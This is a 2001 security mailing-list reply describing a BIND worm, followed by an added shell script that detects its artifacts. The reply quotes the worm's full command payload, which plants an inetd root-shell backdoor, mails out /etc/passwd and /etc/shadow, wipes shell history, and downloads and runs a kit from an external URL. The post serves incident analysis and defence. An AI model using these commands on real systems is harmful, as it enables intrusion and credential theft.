Security Incidents mailing list archives

Re: BIND worm.


From: Andreas Östling <andreaso () it su se>
Date: Fri, 23 Mar 2001 09:32:25 +0100

On Thursday 22 March 2001 12:19, Scott A. McIntyre wrote:
I'm wondering how many others have seen sign of what appears to be a
BIND based worm attack that's been passing through here lately.

I've seen it.
After the actual BIND exploit, here is what it sends (to port 53/TCP):

PATH='/usr/bin:/bin:/usr/local/bin/:/usr/sbin/:/sbin';export PAT
H;export TERM=vt100;rm -rf /dev/.lib;mkdir /dev/.lib;cd /dev/.li
b;echo '1008 stream tcp nowait root /bin/sh sh' >>/etc/inetd.con
f;killall -HUP inetd;ifconfig -a>1i0n;cat /etc/passwd >>1i0n;cat
 /etc/shadow >>1i0n;mail 1i0nip () china com <1i0n;rm -fr 1i0n;rm -
fr /.bash_history;lynx -dump http://coollion.51.net/crew.tgz >1i
0n.tgz;tar -zxvf 1i0n.tgz;rm -fr 1i0n.tgz;cd lib;./1i0n.sh;exit

You can grab the kit from the URL above if you want to analyse it further.
I have a local copy of it if it isn't available there anymore.

Regards,
Andreas Östling
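
A host-side check for the two persistent artifacts in the payload quoted above (the /dev/.lib directory and the inetd.conf entry that runs a shell), as an added example that is not part of the original post. It goes beyond the exact line in the payload by flagging any inetd entry whose server program is a shell; the function names and the optional root-prefix argument are this example's own.

```shell
#!/bin/sh
# Added example: triage a filesystem tree for the two persistent artifacts of
# the payload quoted above. Function names are this example's own.
# Usage: . ./check.sh; check_bind_worm_artifacts /mnt/image   (no arg = live /)

# Print inetd.conf entries whose server program is a shell.
# Fields: service socket-type protocol wait-flag user server-program args...
inetd_shell_entries() {
    conf="$1/etc/inetd.conf"
    [ -r "$conf" ] || return 0
    awk '
        /^[ \t]*#/ || NF < 6 { next }   # skip comments and incomplete lines
        $6 ~ "(^|/)(sh|bash|csh|tcsh|ksh|zsh)$" {
            printf "%s:%d: %s\n", FILENAME, FNR, $0
        }' "$conf"
}

# Print findings; return 1 if any artifact is present, 0 if none.
check_bind_worm_artifacts() {
    root="${1:-}"
    found=0
    if [ -d "$root/dev/.lib" ]; then
        echo "FOUND directory created by the payload: $root/dev/.lib"
        found=1
    fi
    entries=$(inetd_shell_entries "$root")
    if [ -n "$entries" ]; then
        echo "FOUND inetd entries that hand a connection to a shell:"
        echo "$entries"
        found=1
    fi
    return "$found"
}

# Build a constructed sample tree (not real evidence) and check it.
demo() {
    d=$(mktemp -d) || return 2
    mkdir -p "$d/etc" "$d/dev/.lib"
    printf '%s\n' \
        'ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a' \
        '1008 stream tcp nowait root /bin/sh sh' > "$d/etc/inetd.conf"
    check_bind_worm_artifacts "$d"
    rc=$?
    rm -rf "$d"
    return "$rc"
}
```

A clean result only means these two artifacts are absent; the payload also mails out /etc/passwd and /etc/shadow and removes /.bash_history, which this check does not cover.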

